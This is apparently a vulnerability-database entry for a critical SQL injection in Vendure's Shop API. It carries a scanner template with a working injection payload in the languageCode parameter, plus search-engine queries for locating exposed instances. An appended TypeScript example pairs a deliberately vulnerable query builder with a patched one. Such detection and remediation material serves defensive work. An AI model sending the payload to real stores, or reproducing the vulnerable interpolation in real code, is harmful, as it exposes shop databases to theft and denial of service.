Vendure Core - SQL Injection

CVE-2026-40887
Early Release

Description

Vendure, an open-source headless commerce platform built on Node.js/TypeScript, contains a critical SQL injection vulnerability in its Shop API. The languageCode query parameter is interpolated directly into a raw SQL CASE expression in ProductService.findOneBySlug without parameterization or input validation, allowing unauthenticated attackers to execute arbitrary SQL commands. This can lead to full database disclosure and denial of service.

Severity

Critical

CVSS Score

9.1

Published Date

April 17, 2026

Template Author

theamanrawat

CVE-2026-40887.yaml
id: CVE-2026-40887

info:
  name: Vendure Core - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    Vendure, an open-source headless commerce platform built on Node.js/TypeScript, contains a critical SQL injection vulnerability in its Shop API. The languageCode query parameter is interpolated directly into a raw SQL CASE expression in ProductService.findOneBySlug without parameterization or input validation, allowing unauthenticated attackers to execute arbitrary SQL commands. This can lead to full database disclosure and denial of service.
  remediation: Upgrade @vendure/core to version 3.6.2, 3.5.7, or 2.3.4 or later, which add input validation and parameterized queries for the languageCode parameter.
  reference:
    - https://github.com/advisories/GHSA-9pp3-53p2-ww9v
    - https://github.com/vendurehq/vendure/security/advisories/GHSA-9pp3-53p2-ww9v
    - https://github.com/vendurehq/vendure/commit/3ff0bc1
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40887
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2026-40887
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.header:"vendure-auth-token"
    fofa-query: header="vendure-auth-token"
  tags: cve,cve2026,vendure,sqli,unauthenticated

variables:
  num: 999999999

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /shop-api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query":"{ __typename }"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "vendure-auth-token")'
          - 'contains(body, "\"data\"")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /shop-api?languageCode=en'+AND+EXTRACTVALUE(5202,CONCAT(0x5c,(SELECT+MD5('{{num}}'))))+AND+'ptic'%3d'ptic HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query":"{ product(slug: \"a\") { id name } }"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fd'
          - '"product":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d688833bc1c96b3f56ff489d2d2b4e0181da1f88c2ad122c4ca199f1a2a1e9a6022100f145cb370fda2d5612e04eba7c097b7b6804cc43ce1589de9ca2a59a51ddb0eb:922c64590222798bb761d5b6d8e72950
CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
CVE ID:
CVE-2026-40887
CWE ID:
CWE-89

References

https://github.com/advisories/GHSA-9pp3-53p2-ww9v
https://github.com/vendurehq/vendure/security/advisories/GHSA-9pp3-53p2-ww9v
https://github.com/vendurehq/vendure/commit/3ff0bc1
https://nvd.nist.gov/vuln/detail/CVE-2026-40887

Remediation Steps

Upgrade @vendure/core to version 3.6.2, 3.5.7, or 2.3.4 or later, which add input validation and parameterized queries for the languageCode parameter.
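The defect class the description names (a request-controlled languageCode spliced into a raw SQL CASE expression) and the two fixes the remediation names (input validation and a bound parameter), side by side as an added TypeScript example. This is not Vendure's code and does not reproduce ProductService.findOneBySlug or the upstream patch; the table and column names, the `$n` placeholder style (node-postgres convention) and the language-code pattern are assumptions made for illustration.

```typescript
// Added example, not Vendure's code. Assumed: a driver that accepts SQL text plus an
// ordered parameter array (node-postgres style $1, $2 placeholders).
type SqlQuery = { text: string; params: string[] };

// Vulnerable pattern: the attacker-controlled value is interpolated into the CASE
// expression. Everything after a closing single quote is parsed as SQL.
function buildSlugLookupVulnerable(languageCode: string, slug: string): SqlQuery {
  const text =
    `SELECT p.id, ` +
    `CASE WHEN t.languageCode = '${languageCode}' THEN 0 ELSE 1 END AS langRank ` +
    `FROM product p JOIN product_translation t ON t.productId = p.id ` +
    `WHERE t.slug = $1 ORDER BY langRank LIMIT 1`;
  return { text, params: [slug] }; // slug is bound, languageCode is not
}

// Assumed shape of a language code: "en", "pt_BR", "zh_Hans" (ISO 639 + optional
// script + optional region). Anything else, quotes included, is rejected.
const LANGUAGE_CODE_RE = /^[a-z]{2,3}(_[A-Z][a-z]{3})?(_[A-Z]{2})?$/;

function isValidLanguageCode(value: unknown): value is string {
  return typeof value === 'string' && LANGUAGE_CODE_RE.test(value);
}

// Hardened pattern: validate first, then bind the value as a parameter so the
// database never sees it as part of the statement text.
function buildSlugLookupSafe(languageCode: string, slug: string): SqlQuery {
  if (!isValidLanguageCode(languageCode)) {
    throw new Error('invalid languageCode');
  }
  const text =
    `SELECT p.id, ` +
    `CASE WHEN t.languageCode = $1 THEN 0 ELSE 1 END AS langRank ` +
    `FROM product p JOIN product_translation t ON t.productId = p.id ` +
    `WHERE t.slug = $2 ORDER BY langRank LIMIT 1`;
  return { text, params: [languageCode, slug] };
}

// Constructed input showing the two builders diverging on a quote-bearing value.
const constructedInput = "en' AND 1=1 AND 'a'='a";
console.log(buildSlugLookupVulnerable(constructedInput, 'a').text); // quote breaks out
try {
  buildSlugLookupSafe(constructedInput, 'a');
} catch (e) {
  console.log((e as Error).message); // invalid languageCode
}
```

The validation step matters even with binding in place: a bound parameter stops injection, but an allowlist of well-formed codes also keeps unexpected values out of query plans and cache keys, and it is the check that is cheapest to add at the API boundary.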